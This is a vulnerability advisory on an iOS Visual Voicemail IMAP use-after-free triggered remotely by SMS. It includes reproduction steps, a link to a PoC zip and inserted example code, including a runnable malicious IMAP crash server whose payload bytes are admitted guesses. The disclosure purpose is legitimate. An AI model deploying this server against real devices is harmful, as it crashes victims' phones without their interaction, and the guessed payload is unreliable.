
"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free"

Author

"Google Security Research"

Platform

ios

Release date

2019-05-23

Visual Voicemail (VVM) is a feature of mobile devices that presents voicemail in an email-like format. Carriers set up a Visual Voicemail server that supports IMAP, and the device queries this server for new messages. Visual Voicemail is configured over SMS: carriers tell devices where the IMAP server is by sending a specially formatted SMS message containing the URL of the IMAP server.

SMS messages are identified as VVM-related by their Protocol Identifier (PID) field and by their contents. Both can be set by any device sending SMS messages, so any device can send a message that causes Visual Voicemail to query an IMAP server named in the message. An attacker can therefore force a device to connect to an IMAP server they control without the user interacting with the device in any way.

There is an object lifetime issue in the iPhone IMAP client that can be reached in this way. It occurs when a NAMESPACE command response contains a namespace that cannot be parsed correctly: the mailbox separator object is freed but not replaced with a valid object, and a selector is then sent to the freed object.

To reproduce this issue:

1) Run testcrash.py on a remotely accessible server. To run on port 993, this needs to be a server that has a domain name and a certificate that verifies correctly; replace the "YOUR KEY HERE" fields in testcrash.py with the paths to the certificate files. On some carriers it is possible to use port 143 without SSL instead.

2) Send the attached SMS messages to the device, first statepdu.txt and then mboxupdatepdu.txt. Replace the destination number and server location in the messages with those of your target device and server before sending.

3) The device connects to the server and then crashes.
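The server side of the reproduction above, written as an added example rather than the advisory's own testcrash.py: a minimal IMAP server that answers the commands the client sends on the way to NAMESPACE (the LIST reply carries the hierarchy separator the client stores on its connection) and then returns a NAMESPACE reply it cannot parse. The exact bytes are an assumption; the advisory only states that any unparseable NAMESPACE response (or a LOGOUT in its place) takes the failure path, so BAD_NAMESPACE simply truncates the personal-namespace list. With --cert/--key it speaks implicit TLS for port 993; without them it listens in plaintext, which the text says works on some carriers on port 143. handle_command and transcript are pure functions so the exchange can be inspected offline.

```python
import socket
import ssl
import threading

# Constructed server replies (not taken from the advisory's PoC).
# LIST_REPLY carries the separator the client stores on its connection
# object. GOOD_NAMESPACE is a well-formed RFC 2342 reply; BAD_NAMESPACE
# leaves the personal-namespace list unterminated. ASSUMPTION: the bytes
# that make the real client's parser fail are not given in the advisory.
LIST_REPLY = b'* LIST (\\Noselect) "/" ""\r\n'
GOOD_NAMESPACE = b'* NAMESPACE (("" "/")) NIL NIL\r\n'
BAD_NAMESPACE = b'* NAMESPACE (("" "/"\r\n'


def parens_balanced(reply: bytes) -> bool:
    """Cheap well-formedness check for a NAMESPACE reply: every list that is
    opened is closed, and no close appears before its open."""
    depth = 0
    for b in reply:
        if b == ord("("):
            depth += 1
        elif b == ord(")"):
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


def handle_command(line: bytes, namespace_reply: bytes = BAD_NAMESPACE) -> bytes:
    """Build the reply to one tagged IMAP command line (tag, command, args)."""
    parts = line.strip().split(b" ", 2)
    if len(parts) < 2:
        return b"* BAD missing tag or command\r\n"
    tag, cmd = parts[0], parts[1].upper()
    if cmd == b"CAPABILITY":
        return b"* CAPABILITY IMAP4rev1 NAMESPACE\r\n" + tag + b" OK CAPABILITY completed\r\n"
    if cmd == b"LOGIN":
        return tag + b" OK LOGIN completed\r\n"  # accept any credentials
    if cmd == b"LIST":
        return LIST_REPLY + tag + b" OK LIST completed\r\n"
    if cmd == b"NAMESPACE":
        return namespace_reply + tag + b" OK NAMESPACE completed\r\n"
    if cmd == b"LOGOUT":
        return b"* BYE logging out\r\n" + tag + b" OK LOGOUT completed\r\n"
    return tag + b" NO command not supported by this test server\r\n"


def transcript(commands, namespace_reply: bytes = BAD_NAMESPACE):
    """Offline view of the exchange as (client line, server reply) pairs."""
    return [(c, handle_command(c, namespace_reply)) for c in commands]


def session(conn) -> None:
    """Serve one client until it logs out or closes the connection."""
    with conn:
        conn.sendall(b"* OK IMAP4rev1 test server ready\r\n")
        buf = b""
        while True:
            data = conn.recv(4096)
            if not data:
                return
            buf += data
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                conn.sendall(handle_command(line))
                if line.upper().split()[1:2] == [b"LOGOUT"]:
                    return


def serve(port: int, certfile=None, keyfile=None) -> None:
    """Listen on all interfaces; with a certificate, speak implicit TLS."""
    ctx = None
    if certfile:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(certfile, keyfile)
    with socket.create_server(("0.0.0.0", port)) as srv:
        while True:
            client, _ = srv.accept()
            if ctx:
                try:
                    client = ctx.wrap_socket(client, server_side=True)
                except ssl.SSLError:
                    client.close()  # handshake failed; keep accepting
                    continue
            threading.Thread(target=session, args=(client,), daemon=True).start()


if __name__ == "__main__":
    import argparse

    ap = argparse.ArgumentParser(description="IMAP server answering NAMESPACE with a malformed reply")
    ap.add_argument("--port", type=int, default=143)
    ap.add_argument("--cert", help="PEM certificate chain; enables TLS (use with --port 993)")
    ap.add_argument("--key", help="PEM private key matching --cert")
    args = ap.parse_args()
    serve(args.port, args.cert, args.key)
```

Because the client validates the certificate on 993, the chain passed with --cert must be one the device trusts for the hostname placed in the SMS; a self-signed certificate will fail before NAMESPACE is ever sent.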

Note that this attack depends somewhat on the carrier the device is on. I tested this issue on an AT&T SIM. I was not able to reproduce it on a T-Mobile SIM, because that network does not allow VVM connections to outside servers. It might be possible to bypass this by hosting the server on a peer device on the network, but I did not try this. The PID used for VVM SMS messages also varies by carrier.

I've attached a crash log for this issue. I've also attached decoded.txt, which describes the contents of the SMS PDUs, and NAMESPACE.zip, which is a non-minimized PoC that leads to a wider variety of crashes.

When retrieving a message, the VVM client calls [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] to get the server separator and namespace prefix. This method first retrieves the server separator by calling [MFIMAPConnection separatorChar], which sends the LIST command to the server and returns the separator. The method also stores the separator as a member of the connection object, and that member is the separator's sole reference. [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] then calls [MFIMAPConnection serverPathPrefix] to get the prefix, which in turn calls [MFIMAPConnection _doNamespaceCommand] to perform the NAMESPACE command over the network. If this command fails for any reason (for example, a malformed response or a LOGOUT command), it calls [MFIMAPConnection disconnectAndNotifyDelegate:], which removes the separator from the connection object and thereby drops its only reference. The rest of [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] then uses a separator object that has been freed.

This issue was resolved by adding a lock to [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] and [MFIMAPConnection disconnectAndNotifyDelegate:] so that they cannot run at the same time for the same connection.

This issue was fixed on Tuesday, May 14.
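The ownership sequence described above, reduced to a runnable model. This is an added example, not code from the advisory or from Apple's Mail framework: the class and method names mirror the selectors in the text but are stand-ins, the NAMESPACE replies are constructed, and the "parse failure" is a crude prefix-and-parenthesis check. The borrowed reference the caller holds is modelled as a weakref so that CPython's immediate deallocation makes the release observable at the exact point it happens; update_vulnerable dereferences it after the call that can free it, exactly the pre-fix ordering. update_hardened is an illustrative alternative (take an owning reference before anything that can tear the connection down, and treat a disconnect as failure of the whole update); it is not the lock that Apple shipped, which addresses the two methods running concurrently.

```python
import weakref

# Constructed NAMESPACE replies for the model (not from the advisory's PoC).
# GOOD_REPLY is well formed; BAD_REPLY drops the closing parentheses and
# stands in for any response the real client fails to parse. ASSUMPTION:
# the advisory gives no specific bytes, only that a parse failure takes
# the disconnect path.
GOOD_REPLY = b'* NAMESPACE (("" "/")) NIL NIL\r\n'
BAD_REPLY = b'* NAMESPACE (("" "/"\r\n'


class Separator:
    """Stand-in for the separator string object produced by LIST."""

    def __init__(self, ch: str) -> None:
        self.ch = ch


class Connection:
    """Stand-in for MFIMAPConnection. Its member is the separator's only
    strong reference; callers receive a borrowed one."""

    def __init__(self, namespace_reply: bytes) -> None:
        self.namespace_reply = namespace_reply
        self.separator = None
        self.connected = True

    def separator_char(self):
        # LIST answered: store the separator on the connection and hand the
        # caller a non-owning reference (a weakref, so the model can observe
        # the moment the object is released).
        self.separator = Separator("/")
        return weakref.ref(self.separator)

    def server_path_prefix(self):
        return self._do_namespace_command()

    def _do_namespace_command(self):
        # Any failure (unparseable reply, LOGOUT, ...) tears the connection
        # down before control returns to the caller.
        r = self.namespace_reply
        if not r.startswith(b"* NAMESPACE ") or r.count(b"(") != r.count(b")"):
            self.disconnect_and_notify_delegate()
            return None
        return ""  # the personal-namespace prefix; empty in GOOD_REPLY

    def disconnect_and_notify_delegate(self) -> None:
        self.connected = False
        self.separator = None  # drops the sole strong reference: object freed


def update_vulnerable(conn: Connection):
    """Pre-fix ordering of the update: the borrowed separator is used after
    the call that may free it."""
    sep_ref = conn.separator_char()
    prefix = conn.server_path_prefix()   # may disconnect and free the separator
    sep = sep_ref()                      # None once the object is gone
    if sep is None:
        raise RuntimeError("use-after-free: separator released by disconnect")
    return sep.ch, prefix


def update_hardened(conn: Connection):
    """Illustrative hardening (not the shipped lock): hold an owning reference
    across the call that can tear the connection down, and give up if it did."""
    sep_ref = conn.separator_char()
    sep = sep_ref()                      # owning reference for the whole update
    prefix = conn.server_path_prefix()
    if not conn.connected:
        return None
    return sep.ch, prefix


def outcome(reply: bytes) -> dict:
    """Run both flows against one constructed reply and report the results."""
    try:
        vulnerable = update_vulnerable(Connection(reply))
    except RuntimeError as e:
        vulnerable = str(e)
    return {"vulnerable": vulnerable, "hardened": update_hardened(Connection(reply))}
```

The release is visible in the model only because CPython frees the separator the instant the connection drops it; on the real device the same ordering leaves a dangling pointer whose contents depend on what the allocator hands out next, which is why the advisory's non-minimized PoC produces a variety of crashes.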


Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip